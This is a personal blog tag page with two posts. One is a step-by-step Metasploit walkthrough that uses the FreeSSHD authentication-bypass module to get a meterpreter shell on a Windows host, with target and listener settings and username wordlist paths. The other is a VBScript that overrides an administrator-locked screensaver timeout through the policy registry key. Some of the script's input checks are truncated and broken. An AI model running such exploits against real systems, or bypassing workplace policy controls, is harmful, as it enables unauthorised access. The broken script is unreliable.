Top
JohnKlann / Posts tagged "hack"

Kali Linux: Hacking FreeSSHD on Windows to get a meterpreter shell

So I found and interesting exploit in metasploit today mainly out of boredom and I figured I would share here. Below you will find a step my step of how to use metasploit to exploit FreeSSHD on windows to get a meterpreter shell.

start: FreeSSHD on your windows Victim box and check for any custom ports.

freesshd_configurations

freesshd_configurations

start: mfsconsole in kali

msfconsole

msfconsole

search: ssh

search_ssh

search_ssh

copy: exploit/windows/ssh/freesshd_authbypass

run: use exploit/windows/ssh/freesshd_authbypass

run: show options

use_exploit_options

use_exploit_options

run: set RHOST [victim ip]

run: set RPORT [victim port running ssh]

run: set LHOST [host ip]

run: set LPORT [local listening port]

exploit_settings

exploit_settings

run: exploit

exploit_shell

exploit_shell

Note: This exploit uses a user name list for the attack if the user that the ssh service uses to authenticate is not in this list this exploit won’t work. However there is an option you can set if you know the username or wish to guess at it.

ex: set USERNAME crazy_user123456789

Note: Also you can always find larger user name lists and add them to the list that metasploit uses located at “/opt/metasploit/apps/pro/msf3/data/wordlists/unix_users.txt” or you can change this path to point at your own list using the

ex: set USER_FILE /youpath/users.txt

Note: Kali of course has built in wordlist which you can find at the following location

ex: usr/share/dirbuster/wordlists/

Note: Once the exploit works you have a meterpreter shell :)

Solution if you are trying to protect against this attack, use a complicated username or use cygwin sshd for windows operating systems instead.

jklann

How To: Change a registry key with VBS + User Input Screensaver Timeout Duration

So have you ever been working on a work computer and the screen saver timeout period is 15 minutes? Then you go to change it and the properties box is grayed out? Well there is good news you can change this through windows registries. The following vbs script does just that for Windows XP, Windows Vista, and Windows 7.

Now windows uses time in seconds. So 3600 seconds equals 1 hour. This script uses an input box to allow the time to be adjusted based on your preference.

All you have to do is copy and paste the code into notepad and save as screensaver.vbs That’s it double click the file, it will prompt you for a duration click ok and now your screensaver timeout duration has now been adjusted. You can look at the screensaver properties and you will see the change. Another option is to view it in regedit if you feel so inclined.

A video demonstration will be provided shortly.

'System variables
Dim objShell, RegLocate, RegLocate1
Set objShell = WScript.CreateObject("WScript.Shell")
'Creating the input box
strUserInput = InputBox( "Please enter Screen saver duration time out (3600 = 1 Hr) Default value is 900:" )

'Fucntion to check for vailid entries
Function InputCheck(strUserInput)
'checks to make sure that the input field is not blank
if strUserInput =0 then
'warning message box
MsgBox "Please enter a duration"
strUserInput = InputBox( "Please enter Screen saver duration time out (3600 = 1 Hr) Default value is 900:" )
End If
'checks to make sure that a negative number was not inserted
if strUserInput  'warning message box
MsgBox "Please enter a valid duration minimun value of 900s = 15 mintues"
strUserInput = InputBox( "Please enter Screen saver duration time out (3600 = 1 Hr) Default value is 900:" )
End If
'checks to make sure that the input is more than 900 seconds
if strUserInput  'warning message box
MsgBox "Please enter a valid duration minimun value of 900s = 15 mintues"
strUserInput = InputBox( "Please enter Screen saver duration time out (3600 = 1 Hr) Default value is 900:" )
End If
'if it passes all other input checks this actually submits the change and updates the registry
if strUserInput >899 then
On Error Resume Next
'selects the registry key to change
RegLocate = "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Control Panel\Desktop\ScreenSaveTimeOut"
'writes the registry Value and key with the registry value type
objShell.RegWrite RegLocate,strUserInput,"REG_SZ"
'Lets you know it worked
MsgBox "Your Duration has Changed Successfully"
'Ends the script
WScript.Quit
End if
End Function
'Calls the function to run the script
Dim result
result = InputCheck(strUSerInput)

jklann